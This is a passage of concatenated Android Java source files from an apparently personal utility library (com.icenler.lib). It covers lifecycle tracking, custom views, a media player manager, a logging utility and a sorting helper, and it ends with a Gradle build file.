LogUtil.i(activity.getClass().getSimpleName());
activeCount--;
if (activeCount == 0) {
isBackground = true;
background(activity);
if (activityStack.size() > 1) {// 切换到后台, 重新调整 preActivity 索引
preActivity = activityStack.get(activityStack.size() - 2);
} else {
preActivity = null;
}
}
}
@Override
public void onActivitySaveInstanceState(Activity activity, Bundle outState) {
LogUtil.i(activity.getClass().getSimpleName());
}
@Override
public void onActivityDestroyed(Activity activity) {
LogUtil.i(activity.getClass().getSimpleName());
activityStack.remove(activity);
if (activity == preActivity) preActivity = null;
if (activity == currActivity) currActivity = null;
LogUtil.d("PreActivity:" + String.valueOf(preActivity));
LogUtil.d("CurrActivity:" + String.valueOf(currActivity));
}
/**
* 切换后台调用
*/
private void background(Activity activity) {
LogUtil.i("The background to switch");
LocalBroadcastManager.getInstance(activity).sendBroadcast(new Intent(ACTION_BACKGROUND_CHANGED));
}
/**
* 切换前台调用
*/
private void foreground(Activity activity) {
LogUtil.i("The foreground to switch");
LocalBroadcastManager.getInstance(activity).sendBroadcast(new Intent(ACTION_FOREGROUND_CHANGED));
}
}
<file_sep>package com.icenler.lib.view.guideview;
import android.view.View;
import android.view.WindowManager;
public class Hint {
public enum Anchor {
ANCHOR_LEFT, ANCHOR_RIGHT,
ANCHOR_TOP, ANCHOR_BOTTOM, ANCHOR_OVER
}
public enum Gravity {
GRAVITY_START, GRAVITY_END, GRAVITY_CENTER
}
View hintView;
Anchor anchor;
Gravity gravity;
int absX;
int absY;
int offsetX;
int offsetY;
int width;
int height;
int maskAnchorId;
public static Builder builder() {
return new Builder();
}
private Hint(Builder builder) {
this.hintView = builder.hintView;
this.anchor = builder.anchor;
this.gravity = builder.gravity;
this.absX = builder.absX;
this.absY = builder.absY;
this.offsetX = builder.offsetX;
this.offsetY = builder.offsetY;
this.width = builder.width;
this.height = builder.height;
this.maskAnchorId = builder.maskAnchorId;
}
public static final class Builder {
private View hintView;
private Anchor anchor = Anchor.ANCHOR_OVER;
private Gravity gravity = Gravity.GRAVITY_START;
private int absX;
private int absY;
private int offsetX;
private int offsetY;
private int width = WindowManager.LayoutParams.WRAP_CONTENT;
private int height = WindowManager.LayoutParams.WRAP_CONTENT;
private int maskAnchorId = View.NO_ID;
private Builder() {
}
public Builder setHintView(View hintView) {
this.hintView = hintView;
return this;
}
public Builder setAnchor(Anchor anchor) {
this.anchor = anchor;
return this;
}
public Builder setGravity(Gravity gravity) {
this.gravity = gravity;
return this;
}
public Builder setAbsX(int x) {
this.absX = x;
return this;
}
public Builder setAbsY(int y) {
this.absY = y;
return this;
}
public Builder setOffsetX(int x) {
this.offsetX = x;
return this;
}
public Builder setOffsetY(int y) {
this.offsetY = y;
return this;
}
public Builder setWidth(int width) {
this.width = width;
return this;
}
public Builder setHeight(int height) {
this.height = height;
return this;
}
public Builder setLayoutParams(int width, int height) {
this.width = width;
this.height = height;
return this;
}
public Builder setMaskAnchorId(int maskAnchorId) {
this.maskAnchorId = maskAnchorId;
return this;
}
public Hint build() {
return new Hint(this);
}
}
}<file_sep>package com.icenler.lib.view;
import android.content.Context;
import android.support.v4.view.ViewPager;
import android.util.AttributeSet;
import android.view.MotionEvent;
/**
* Created by Cenler - 2015/3/26.
* Description:屏蔽 ViewPager 事件,通过setPagingEnabled设置是否可用
*/
public class NoSwipeViewPager extends ViewPager {
private boolean mEnabled = false;
public NoSwipeViewPager(Context context, AttributeSet attrs) {
super(context, attrs);
}
@Override
public boolean onTouchEvent(MotionEvent ev) {
return mEnabled ? super.onTouchEvent(ev) : false;
}
@Override
public boolean onInterceptTouchEvent(MotionEvent ev) {
return mEnabled ? super.onInterceptTouchEvent(ev) : false;
}
/**
* 设置控件是否可滑动
*/
public void setPagingEnabled(boolean enabled) {
this.mEnabled = enabled;
}
}
<file_sep>package com.icenler.lib.utils.manager;
import android.support.design.widget.Snackbar;
import android.view.ViewGroup;
/**
* Created by iCenler - 2015/7/15.
* Description:自定义全局 Snackbar
* 1、 配合 CoordinatorLayout 实现滑动移除
* 2、 TODO 待完善添加
*/
public class SnackbarManager {
private SnackbarManager() {
throw new UnsupportedOperationException("cannot be instantiated");
}
public static void show(ViewGroup parent, String msg) {
Snackbar.make(parent, msg, Snackbar.LENGTH_LONG).show();
}
public static void show(ViewGroup parent, int strRes) {
show(parent, parent.getContext().getString(strRes));
}
}
<file_sep>package com.icenler.lib.utils.manager;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.media.AudioManager;
import android.media.MediaPlayer;
import android.net.Uri;
import android.os.Build;
import com.icenler.lib.feature.App;
import java.io.IOException;
/**
* Created by iCenler - 2015/10/8.
* Description:音乐播放管理类(需要权限android.permission.MODIFY_AUDIO_SETTINGS)
*/
public class PlayerManager {
private static PlayerManager playerManager;
private Context context;
private MediaPlayer mediaPlayer;
private AudioManager audioManager;
private PlayCallback callback;
private String filePath;
public static PlayerManager getManager() {
if (playerManager == null) {
synchronized (PlayerManager.class) {
playerManager = new PlayerManager();
}
}
return playerManager;
}
private PlayerManager() {
this.context = App.getInstance();
mediaPlayer = new MediaPlayer();
audioManager = (AudioManager) context.getSystemService(Context.AUDIO_SERVICE);
}
/**
* 播放回调接口
*/
public interface PlayCallback {
/**
* 音乐准备完毕
*/
void onPrepared();
/**
* 音乐播放完成
*/
void onComplete();
/**
* 音乐停止播放
*/
void onStop();
}
/**
* 播放音乐
*
* @param path 音乐文件路径
* @param callback 播放回调函数
*/
public void play(String path, final PlayCallback callback) {
this.filePath = path;
this.callback = callback;
try {
mediaPlayer.reset();
mediaPlayer.setDataSource(context, Uri.parse(path));
mediaPlayer.prepare();
mediaPlayer.setOnPreparedListener(new MediaPlayer.OnPreparedListener() {
@Override
public void onPrepared(MediaPlayer mp) {
callback.onPrepared();
mediaPlayer.start();
}
});
} catch (IOException e) {
e.printStackTrace();
}
}
/**
* 停止播放
*/
public void stop() {
if (isPlaying()) {
try {
mediaPlayer.stop();
callback.onStop();
} catch (IllegalStateException e) {
e.printStackTrace();
}
}
}
/**
* 是否正在播放
*
* @return 正在播放返回true, 否则返回false
*/
public boolean isPlaying() {
return mediaPlayer != null && mediaPlayer.isPlaying();
}
/**
* 切换到外放
*/
public void changeToSpeaker() {
audioManager.setMode(AudioManager.MODE_NORMAL);
audioManager.setSpeakerphoneOn(true);
}
/**
* 切换到耳机模式
*/
public void changeToHeadset() {
audioManager.setSpeakerphoneOn(false);
}
/**
* 切换到听筒
*/
public void changeToReceiver() {
audioManager.setSpeakerphoneOn(false);
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.HONEYCOMB) {
audioManager.setMode(AudioManager.MODE_IN_COMMUNICATION);
} else {
audioManager.setMode(AudioManager.MODE_IN_CALL);
}
}
/**
* 提高音量
*/
public void raiseVolume() {
/*int mode = audioManager.getMode();
if (mode == AudioManager.MODE_IN_CALL || mode == AudioManager.MODE_IN_COMMUNICATION){
int currentVolume = audioManager.getStreamVolume(AudioManager.STREAM_VOICE_CALL);
if (currentVolume < audioManager.getStreamMaxVolume(AudioManager.STREAM_VOICE_CALL)) {
audioManager.adjustStreamVolume(AudioManager.STREAM_VOICE_CALL,
AudioManager.ADJUST_RAISE, AudioManager.FX_FOCUS_NAVIGATION_UP);
}
} else if (mode == AudioManager.MODE_NORMAL){
int currentVolume = audioManager.getStreamVolume(AudioManager.STREAM_MUSIC);
if (currentVolume < audioManager.getStreamMaxVolume(AudioManager.STREAM_MUSIC)) {
audioManager.adjustStreamVolume(AudioManager.STREAM_MUSIC,
AudioManager.ADJUST_RAISE, AudioManager.FX_FOCUS_NAVIGATION_UP);
}
}*/
int currentVolume = audioManager.getStreamVolume(AudioManager.STREAM_MUSIC);
if (currentVolume < audioManager.getStreamMaxVolume(AudioManager.STREAM_MUSIC)) {
audioManager.adjustStreamVolume(AudioManager.STREAM_MUSIC,
AudioManager.ADJUST_RAISE, AudioManager.FX_FOCUS_NAVIGATION_UP);
}
}
/**
* 降低音量
*/
public void lowerVolume() {
/*int mode = audioManager.getMode();
if (mode == AudioManager.MODE_IN_CALL || mode == AudioManager.MODE_IN_COMMUNICATION){
int currentVolume = audioManager.getStreamVolume(AudioManager.STREAM_VOICE_CALL);
if (currentVolume < audioManager.getStreamMaxVolume(AudioManager.STREAM_VOICE_CALL)) {
audioManager.adjustStreamVolume(AudioManager.STREAM_VOICE_CALL,
AudioManager.ADJUST_LOWER, AudioManager.FX_FOCUS_NAVIGATION_UP);
}
} else if (mode == AudioManager.MODE_NORMAL){
int currentVolume = audioManager.getStreamVolume(AudioManager.STREAM_MUSIC);
if (currentVolume < audioManager.getStreamMaxVolume(AudioManager.STREAM_MUSIC)) {
audioManager.adjustStreamVolume(AudioManager.STREAM_MUSIC,
AudioManager.ADJUST_LOWER, AudioManager.FX_FOCUS_NAVIGATION_UP);
}
}*/
int currentVolume = audioManager.getStreamVolume(AudioManager.STREAM_MUSIC);
if (currentVolume < audioManager.getStreamMaxVolume(AudioManager.STREAM_MUSIC)) {
audioManager.adjustStreamVolume(AudioManager.STREAM_MUSIC,
AudioManager.ADJUST_LOWER, AudioManager.FX_FOCUS_NAVIGATION_UP);
}
}
/**
* 耳机插入拔出广播接收器
*/
class HeadsetReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
String action = intent.getAction();
switch (action) {
//插入和拔出耳机会触发此广播
case Intent.ACTION_HEADSET_PLUG:
int state = intent.getIntExtra("state", 0);
if (state == 1) {
playerManager.changeToHeadset();
} else if (state == 0) {
playerManager.changeToSpeaker();
}
break;
default:
break;
}
}
}
}
<file_sep>package com.icenler.lib.view;
import android.content.Context;
import android.graphics.Canvas;
import android.os.Build;
import android.text.Layout;
import android.text.StaticLayout;
import android.text.TextPaint;
import android.text.TextUtils;
import android.util.AttributeSet;
import android.widget.Scroller;
import android.widget.TextView;
import java.util.ArrayList;
/**
* Created by iCenler - 2016/7/5.
* Description:数字落入动效
*/
public class AnimTextView extends TextView {
private float mFold = 1.3f;//其他列的动画时常的倍数
private float mW;//单列的宽
private float mSpacingMulti = 1.0f;//StaticLayout行间距的倍数1.0为正常值
private int mLayoutH;//StaticLayout高
private int mAddMax = 3;//控制递增动画,递增的量
private ArrayList<String> mStrList = new ArrayList<String>();//生成的String集合
private ArrayList<Scroller> mScrList = new ArrayList<Scroller>();//滚动类集合
private ArrayList<StaticLayout> mLayoutList = new ArrayList<StaticLayout>();//绘制String的Layout集合
public AnimTextView(Context context) {
super(context);
}
public AnimTextView(Context context, AttributeSet attrs) {
super(context, attrs);
}
public AnimTextView(Context context, AttributeSet attrs, int defStyleAttr) {
super(context, attrs, defStyleAttr);
}
/**
* 开启新数据替换老数据的动画
*
* @param oldNum 老数据
* @param newNum 新数据
*/
public void setText(String oldNum, String newNum) {
super.setText(newNum);
if (TextUtils.isEmpty(oldNum) || TextUtils.isEmpty(newNum)) {
return;
}
clearList();
makeUnequalData(newNum, oldNum);
}
private void makeUnequalData(String oldNum, String newNum) {
StringBuilder sb = new StringBuilder();
int l1 = oldNum.length() - 1;
int l2 = newNum.length() - 1;
for (; l1 > -1 || l2 > -1; --l1, --l2) {
sb.setLength(0);
mStrList.add(0, sb.append(l1 > -1 ? oldNum.charAt(l1) : '0').append("\n").append(l2 > -1 ? newNum.charAt(l2) : '0').toString());
}
}
/**
* 开启递增动画
* 例:传入值528,会生成三组String,分别是:
* "5\n6\n7\n8","2\n3\n4\n5","8\n9\n0\n1"
* 这里的规则是按照mAddMax的条件,生成一串递增+1的字符串
*/
public void setText(String content, boolean isAnim) {
super.setText(content);
clearList();
for (int i = 0; i < content.length(); i++) {
char c = content.charAt(i);
makeData(Integer.parseInt(c + ""));
}
}
public void startAnim() {
if (mStrList.size() == 0) return;
int mDur = 1500;//第一列动画的时间基数
float x = 1 + (mStrList.size() * 0.06f < 0.1 ? 0 : mStrList.size() * 0.06f);
x = x > 1.30f ? 1.30f : x;
mW = (getWidth() / mStrList.size()) * x;
mLayoutH = 0;
TextPaint p = getPaint();
p.setColor(getCurrentTextColor());
for (int i = 0; i < mStrList.size(); i++) {
if (!TextUtils.isEmpty(mStrList.get(i))) {
StaticLayout layout = new StaticLayout(mStrList.get(i), p, (int) mW, Layout.Alignment.ALIGN_CENTER, mSpacingMulti, 0.0F, true);
mLayoutList.add(layout);
Scroller scroller = new Scroller(getContext());
mLayoutH = layout.getHeight();
scroller.startScroll(0, -mLayoutH, 0, mLayoutH, mDur);
mScrList.add(scroller);
mDur = (int) (mDur * mFold);
}
}
}
private void clearList() {
mStrList.clear();
mScrList.clear();
mLayoutList.clear();
}
//按照字体大小+includpad的和返回控件的大小(消除background是大图片的时候是按照图片大小)
@Override
protected int getSuggestedMinimumHeight() {
return Build.VERSION.SDK_INT > 16 ? getMinimumHeight() : 0;
}
@Override
protected int getSuggestedMinimumWidth() {
return Build.VERSION.SDK_INT > 16 ? getMinimumWidth() : 0;
}
private void makeData(int data) {
StringBuilder sb = new StringBuilder();
sb.append(data);
for (int i = 1; i <= mAddMax; i++) {
int num = data + i;
if (num > 9) num = num % 10;
sb.append("\n" + num);
}
mStrList.add(sb.toString());
}
private String mLast = null;
@Override
protected void onDraw(Canvas canvas) {
CharSequence str = getText();
if (str == null) return;
if (str != mLast) {
mLast = str.toString();
startAnim();
postInvalidate();
return;
}
if (mStrList.size() == 0 || mScrList.size() == 0 || mLayoutList.size() == 0) {
super.onDraw(canvas);
return;
}
try {
boolean invalidate = false;
for (int i = 0; i < mStrList.size(); i++) {
canvas.save();
canvas.translate(i * 3 * mW / 4, 0);
Scroller scroller = mScrList.get(i);
if (scroller != null && scroller.computeScrollOffset()) {
canvas.translate(0, scroller.getCurrY());
invalidate = true;
}
StaticLayout layout = mLayoutList.get(i);
if (layout != null) layout.draw(canvas);
canvas.restore();
}
if (invalidate) postInvalidate();
} catch (Exception e) {
e.printStackTrace();
}
//super.onDraw(canvas);
}
public void clearLast() {
mLast = null;
}
}
<file_sep>package com.icenler.lib.utils;
import android.text.TextUtils;
import android.util.Log;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import java.io.File;
/**
* Created by iCenler - 2015/7/15.
* Description:Log 工具
* 1、TAG 自动产生,格式: customTagPrefix:className.methodName(L:lineNumber),
* 2、customTagPrefix 为空时只输出:className.methodName(L:lineNumber)
* 3、通过设置日志等级标记位控制是否输出
*/
public class LogUtil {
private LogUtil() {
throw new UnsupportedOperationException("cannot be instantiated");
}
static String customTagPrefix = "iCenler";
// 日志等级控制是否输出
static boolean allowD = true;// Debug
static boolean allowE = true;// Error
static boolean allowI = true;// Info
static boolean allowV = true;// Verbose
static boolean allowW = true;// Warn
static boolean allowWtf = true;// what a terrible failure
private static boolean CONTROL_SWITCH = true;
static {
if (!CONTROL_SWITCH) {
allowD = allowE = allowI = allowV = allowW = allowWtf = false;
}
}
/**
* Log 日志输出扩展,可实现 CustomLogger 接口进行自定义
*/
public static CustomLogger customLogger;
public static void setCustomLogger(CustomLogger logger) {
customLogger = logger;
}
public interface CustomLogger {
void d(String tag, String content);
void d(String tag, String content, Throwable tr);
void e(String tag, String content);
void e(String tag, String content, Throwable tr);
void i(String tag, String content);
void i(String tag, String content, Throwable tr);
void v(String tag, String content);
void v(String tag, String content, Throwable tr);
void w(String tag, String content);
void w(String tag, String content, Throwable tr);
void w(String tag, Throwable tr);
void wtf(String tag, String content);
void wtf(String tag, String content, Throwable tr);
void wtf(String tag, Throwable tr);
}
private static String generateTag(StackTraceElement caller) {
String tag = "%s.%s(L:%d)";
String callerClazzName = caller.getClassName();
callerClazzName = callerClazzName.substring(callerClazzName.lastIndexOf(".") + 1);
tag = String.format(tag, callerClazzName, caller.getMethodName(), caller.getLineNumber());
tag = TextUtils.isEmpty(customTagPrefix) ? tag : customTagPrefix + ":" + tag;
// 可跳转日志输出格式
// String className = caller.getFileName();
// String methodName = caller.getMethodName();
// int lineNumber = caller.getLineNumber();
// StringBuilder stringBuilder = new StringBuilder();
// stringBuilder.append("(").append(className).append(":").append(lineNumber).append(")#").append(methodName).append("");
return tag;
}
public static void d(String content) {
if (!allowD) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.d(tag, String.valueOf(content));
} else {
Log.d(tag, String.valueOf(content));
}
}
public static void d(String content, Throwable tr) {
if (!allowD) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.d(tag, String.valueOf(content), tr);
} else {
Log.d(tag, String.valueOf(content), tr);
}
}
public static void e(String content) {
if (!allowE) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.e(tag, String.valueOf(content));
} else {
Log.e(tag, String.valueOf(content));
}
}
public static void e(String content, Throwable tr) {
if (!allowE) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.e(tag, String.valueOf(content), tr);
} else {
Log.e(tag, String.valueOf(content), tr);
}
}
public static void i(String content) {
if (!allowI) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.i(tag, String.valueOf(content));
} else {
Log.i(tag, String.valueOf(content));
}
}
public static void i(String content, Throwable tr) {
if (!allowI) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.i(tag, String.valueOf(content), tr);
} else {
Log.i(tag, String.valueOf(content), tr);
}
}
public static void v(String content) {
if (!allowV) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.v(tag, String.valueOf(content));
} else {
Log.v(tag, String.valueOf(content));
}
}
public static void v(String content, Throwable tr) {
if (!allowV) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.v(tag, String.valueOf(content), tr);
} else {
Log.v(tag, String.valueOf(content), tr);
}
}
public static void w(String content) {
if (!allowW) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.w(tag, String.valueOf(content));
} else {
Log.w(tag, String.valueOf(content));
}
}
public static void w(String content, Throwable tr) {
if (!allowW) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.w(tag, String.valueOf(content), tr);
} else {
Log.w(tag, String.valueOf(content), tr);
}
}
public static void w(Throwable tr) {
if (!allowW) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.w(tag, tr);
} else {
Log.w(tag, tr);
}
}
public static void wtf(String content) {
if (!allowWtf) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.wtf(tag, String.valueOf(content));
} else {
Log.wtf(tag, String.valueOf(content));
}
}
public static void wtf(String content, Throwable tr) {
if (!allowWtf) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.wtf(tag, String.valueOf(content), tr);
} else {
Log.wtf(tag, String.valueOf(content), tr);
}
}
public static void wtf(Throwable tr) {
if (!allowWtf) return;
StackTraceElement caller = getCallerStackTraceElement();
String tag = generateTag(caller);
if (customLogger != null) {
customLogger.wtf(tag, tr);
} else {
Log.wtf(tag, tr);
}
}
/**
* 格式化 Json 输出
*
* @param content
*/
public static void json(String content) {
if (!allowD) return;
String message = null;
try {
if (content.startsWith("{")) {
JSONObject jsonObject = new JSONObject(content);
message = jsonObject.toString(4);
} else if (content.startsWith("[")) {
JSONArray jsonArray = new JSONArray(content);
message = jsonArray.toString(4);
} else {
throw new JSONException("Invalid Json data");
}
} catch (JSONException e) {
e("Invalid Json data", e);
return;
}
String tag = generateTag(getCallerStackTraceElement());
Log.d(tag, "╔═══════════════════════════════════════════════════════════════════════════════════════");
String[] lines = message.split(File.separator);
StringBuilder jsonContent = new StringBuilder();
for (String line : lines)
jsonContent.append("║ ").append(line).append(File.separator);
Log.d(tag, jsonContent.toString());
Log.d(tag, "╚═══════════════════════════════════════════════════════════════════════════════════════");
}
/**
* StackTraceElement >>>
* String getClassName() - 返回类的完全限定名,该类包含由该堆栈跟踪元素所表示的执行点。
* String getFileName() - 返回源文件名,该文件包含由该堆栈跟踪元素所表示的执行点。
* int getLineNumber() - 返回源行的行号,该行包含由该堆栈该跟踪元素所表示的执行点。
* String getMethodName()- 返回方法名,此方法包含由该堆栈跟踪元素所表示的执行点。
* String toString() - 返回表示该堆栈跟踪元素的字符串。
*
* @return 线程堆栈转储的堆栈跟踪元素数组(Ps:index 可通过断点调试查看)
*/
public static StackTraceElement getCallerStackTraceElement() {
return Thread.currentThread().getStackTrace()[4];
}
public static StackTraceElement getCurrentStackTraceElement() {
return Thread.currentThread().getStackTrace()[3];
}
}
<file_sep>package com.icenler.lib.view.widget;
import android.app.Activity;
import android.content.Context;
import android.util.AttributeSet;
import android.view.View;
import android.widget.ImageButton;
/**
* Created by Cenler - 2015/3/26
* Description:点击返回的 ImageButton
*/
public class BackImgButton extends ImageButton {
public BackImgButton(Context context) {
super(context);
initView();
}
public BackImgButton(Context context, AttributeSet attrs) {
super(context, attrs);
initView();
}
public BackImgButton(Context context, AttributeSet attrs, int defStyle) {
super(context, attrs, defStyle);
initView();
}
private void initView() {
this.setOnClickListener(new OnClickListener() {
@Override
public void onClick(View v) {
Context context = getContext();
if (context instanceof Activity) {
((Activity) context).finish();
}
}
});
}
}
<file_sep>package com.icenler.lib.utils;
import java.lang.reflect.Method;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
/**
* Created by iCenler - 2015/7/13.
* Description: 排序相关工具类
*/
public class SortUtil {
public static final int COMPARE_TYPE_STRING = 0;
public static final int COMPARE_TYPE_INT = 1;
public static final int COMPARE_TYPE_LONG = 2;
private static <T> int doCompare(final String method, final Class[] methodArgsClass,
final Object[] methodArgs, final String order, Object object1, Object object2,
int compareType, boolean ignoreCharType) {
int result = 0;
try {
Method compareMethod1 = object1.getClass().getMethod(method, methodArgsClass);
Method compareMethod2 = object2.getClass().getMethod(method, methodArgsClass);
if (null == compareMethod1.invoke(object1, methodArgs) || null == compareMethod2.invoke(object2, methodArgs)) {
return result;
}
if (compareType == COMPARE_TYPE_INT) {
//按int类型比较
int value1 = (Integer) compareMethod1.invoke(object1, methodArgs);
int value2 = (Integer) compareMethod1.invoke(object2, methodArgs);
if (value1 == value2) {
return result = 0;
}
if (order != null && "DESC".equals(order)) {
result = value2 > value1 ? 1 : -1;
} else {
result = value1 > value2 ? 1 : -1;
}
} else if (compareType == COMPARE_TYPE_LONG) {
//按long类型比较
long value1 = (Long) compareMethod1.invoke(object1, methodArgs);
long value2 = (Long) compareMethod1.invoke(object2, methodArgs);
if (value1 == value2) {
return result = 0;
}
if (order != null && "DESC".equals(order)) {
result = value2 > value1 ? 1 : -1;
} else {
result = value1 > value2 ? 1 : -1;
}
} else if (compareType == COMPARE_TYPE_STRING) {
//按long类型比较
String value1 = (String) compareMethod1.invoke(object1, methodArgs);
String value2 = (String) compareMethod1.invoke(object2, methodArgs);
if (value1 != null && value2 != null) {
if (!ignoreCharType) {
return compareString(value1, value2);
} else {
return value1.compareTo(value2);
}
}
}
} catch (Exception e) {
e.printStackTrace();
}
return result;
}
private static int compareString(String oneString, String anotherString) {
int len1 = oneString.length();
int len2 = anotherString.length();
int lim = Math.min(len1, len2);
char v1[] = oneString.toCharArray();
char v2[] = anotherString.toCharArray();
int k = 0;
while (k < lim) {
char c1 = v1[k];
char c2 = v2[k];
//如果是英文,则排在前面
if (isLetter(c1) && !isLetter(c2)) {
return -1;
}
//如果是数字,则排在前面
if (isNumeric(c1) && !isNumeric(c2)) {
//第二个是英文,英文排在前面
if (isLetter(c2)) {
return 1;
} else {//其他情况,数字排在前面
return -1;
}
}
//如果是中文(非数字),则排在前面
if (isChinese(c1) && !isChinese(c2)) {
if (isLetter(c2) || isNumeric(c2)) {
return 1;
} else {
return -1;
}
}
if (c1 != c2) {
return c1 - c2;
}
k++;
}
return len1 - len2;
}
private static <T> int doCompare(final String method, final Class[] methodArgsClass,
final Object[] methodArgs, final String order, Object object1, Object object2,
int compareType) {
return doCompare(method, methodArgsClass, methodArgs, order, object1, object2, compareType, false);
}
// 是否是英文
private static boolean isLetter(char c) {
return Character.isUpperCase(c) || Character.isLowerCase(c);
}
// 是否是数字
private static boolean isNumeric(char c) {
return Character.isDigit(c);
}
// 是否是中文
private static boolean isChinese(char key) {
return (key >= 0x4e00 && key <= 0x9fa5) ? true : false;
}
public static <T> void sortByString(List<T> list, final String method, final Class[] methodArgsClass, final Object[] methodArgs, final String order) {
try {
Collections.sort(list, new Comparator() {
@Override
public int compare(Object object1, Object object2) {
return doCompare(method, methodArgsClass, methodArgs, order, object1, object2, COMPARE_TYPE_STRING, true);
}
});
} catch (Exception e) {
e.printStackTrace();
} catch (Error e) {
e.printStackTrace();
}
}
public static <T> void sortByStringCritical(List<T> list, final String method, final Class[] methodArgsClass, final Object[] methodArgs, final String order) {
try {
Collections.sort(list, new Comparator() {
@Override
public int compare(Object object1, Object object2) {
return doCompare(method, methodArgsClass, methodArgs, order, object1, object2, COMPARE_TYPE_STRING, false);
}
});
} catch (Exception e) {
e.printStackTrace();
} catch (Error e) {
e.printStackTrace();
}
}
@SuppressWarnings("unchecked")
public static <T> void sortByInteger(List<T> list, final String method, final Class[] methodArgsClass, final Object[] methodArgs, final String order) {
// 宽松汉字拼音排序
try {
Collections.sort(list, new Comparator() {
@Override
public int compare(Object object1, Object object2) {
return doCompare(method, methodArgsClass, methodArgs, order, object1, object2, COMPARE_TYPE_INT);
}
});
} catch (Exception e) {
e.printStackTrace();
} catch (Error e) {
e.printStackTrace();
}
}
}
<file_sep>// Android 程序申明
apply plugin: 'com.android.application'
// Android 相关配置
android {
// 编译SDK版本
compileSdkVersion 23
// 构建工具版本
buildToolsVersion '23.0.1'
// App 标识及相关版本信息
defaultConfig {
applicationId "com.icenler.lib"
minSdkVersion 19
targetSdkVersion 23
versionCode 1
versionName "1.0.0"
}
// Java 版本
compileOptions {
sourceCompatibility JavaVersion.VERSION_1_7
targetCompatibility JavaVersion.VERSION_1_7
}
signingConfigs {
debug { /* No debug config*/ }
release {
// storeFile file("../key/*.keystore")
// storePassword ""
// keyAlias ""
// keyPassword ""
}
}
// 编译类型配置(如:混淆)
buildTypes {
debug {}
release {
// // 不显示Log
// buildConfigField "boolean", "LOG_DEBUG", "false"
//
// minifyEnabled true // 是否混淆
// zipAlignEnabled true
// shrinkResources true // 移除无用的resource文件
// signingConfig signingConfigs.release
// 混淆配置文件
proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'
}
}
// 忽略 Lint 检查的 error
// lintOptions {
// abortOnError false
// }
}
// 模块依赖
dependencies {
compile fileTree(dir: 'libs', include: ['*.jar'])
compile 'com.android.support:support-v4:23.0.1'
// compile 'com.android.support:appcompat-v7:23.0.1'
compile 'com.android.support:design:23.3.0' // 支持 app:layout_scrollFlags="snap"
// compile 'com.android.support:design:23.0.1'
compile 'com.android.support:recyclerview-v7:23.0.1'
compile 'com.android.support:cardview-v7:23.0.1'
compile 'com.android.support:palette-v7:23.0.1'
// 工具
compile 'org.xutils:xutils:3.3.36'
compile 'com.google.code.gson:gson:2.3.1'
compile 'com.alibaba:fastjson:1.2.9'
compile 'com.nineoldandroids:library:2.4.0'
compile 'com.jakewharton:butterknife:8.4.0'
annotationProcessor 'com.jakewharton:butterknife-compiler:8.4.0'
compile 'com.zhy:percent-support-extends:1.0.6'
compile 'de.greenrobot:eventbus:2.4.0'
compile 'io.reactivex:rxandroid:1.0.1'
compile 'io.reactivex:rxjava:1.0.14'
compile 'com.anupcowkur:reservoir:3.0.0'
// 网络
compile 'com.squareup.okhttp:okhttp:2.4.0'
compile 'com.squareup.retrofit2:retrofit:2.1.0'
compile 'com.mcxiaoke.volley:library:1.0.19'
// 图片
compile 'com.facebook.fresco:fresco:0.8.1+'
compile 'com.squareup.picasso:picasso:2.5.2'
compile 'com.github.bumptech.glide:glide:3.7.0'
compile 'com.nostra13.universalimageloader:universal-image-loader:1.9.5'
// 友盟Gradle打包
// compile 'com.umeng.analytics:analytics:latest.integration'
// 自动布局
// compile 'com.zhy:autolayout:1.3.4'
// compile 'com.android.support:percent:22.2.0'
// 基于RxJava 事件绑定及相关卓展
compile 'com.jakewharton.rxbinding:rxbinding:0.2.0'
// compile 'com.jakewharton.rxbinding:rxbinding-support-v4:0.2.0'
// compile 'com.jakewharton.rxbinding:rxbinding-appcompat-v7:0.2.0'
// compile 'com.jakewharton.rxbinding:rxbinding-design:0.2.0'
// compile 'com.jakewharton.rxbinding:rxbinding-recyclerview-v7:0.2.0'
// compile 'com.trello:rxlifecycle:1.0'
// If you want to bind to Android-specific lifecycles
// compile 'com.trello:rxlifecycle-android:1.0'
// Glide 图片加载框架
// compile 'com.github.bumptech.glide:glide:3.7.0'
// compile 'jp.wasabeef:glide-transformations:1.4.0'
// compile 'jp.co.cyberagent.android.gpuimage:gpuimage-library:1.3.0'// If you want to use the GPU Filters
// compile 'com.github.bumptech.glide:okhttp-integration:1.3.1@aar'// Okhttp 网络请求对接
// compile 'com.github.bumptech.glide:volley-integration:1.3.1@aar'// Volley 网络请求对接
// compile 'com.github.chrisbanes.photoview:library:1.2.4' // 照片查看控件
// compile 'com.baoyz.swipemenulistview:library:1.3.0' // ListView item侧滑菜单
// compile 'com.crashlytics.android:crashlytics:1.+' // 崩溃统计
// compile 'cn.pedant.sweetalert:library:1.3' // dialog
// compile 'com.almeros.android-gesture-detectors:library:1.0' // 手势检测
